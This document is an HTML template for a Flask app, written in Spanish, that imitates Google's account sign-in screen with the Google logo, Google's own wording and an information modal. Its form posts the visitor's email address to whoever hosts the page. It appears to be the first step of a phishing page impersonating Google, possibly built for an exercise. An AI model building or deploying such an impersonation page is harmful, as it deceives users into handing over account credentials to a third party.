<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{{url_for('static', filename='css/password.css') }}"> 
    <title>Accede a tu cuenta</title>
</head>

<body>
    <img src="{{url_for('static', filename='images/Google_2015_logo.svg.png')}}" alt="logo" width="150" height="50">
    
    <h1> Accede a tu cuenta </h1>
    <h2>Usa tu Cuenta de Google. La cuenta se agregará a este dispositivo y estará disponible para otras apps de Google.</h2> \

    <a href="#" class="open-google">Mas informacion sobre el uso de tu cuenta</a>

    <form method="post">
        {{formu.hidden_tag()}}
        <div class="campo">
            {{formu.email.label}} {{formu.email}}
        </div>
        {{formu.submit}}
    </form>

    <div id="modal-google" class="modal-google">
        <div class="modal-google-content" id="modal-content">
            <h2 class="login-title">El dispositivo funciona mejor con una Cuenta de Google:</h2>

            <ul class="login-list">
                <li>Descargar aplicaciones, música, juegos y otros contenidos de Google Play</li>
                <li>Realizar una copia de seguridad de tus aplicaciones en Google y sincronizar servicios de Google, como el calendario y los contactos, con tu dispositivo</li>
                <li>Activar funciones de protección del dispositivo</li>
            </ul>
        </div>
    </div>

    <script src="{{ url_for('static', filename='scripts/info.js') }}"></script>

</body>
</html>
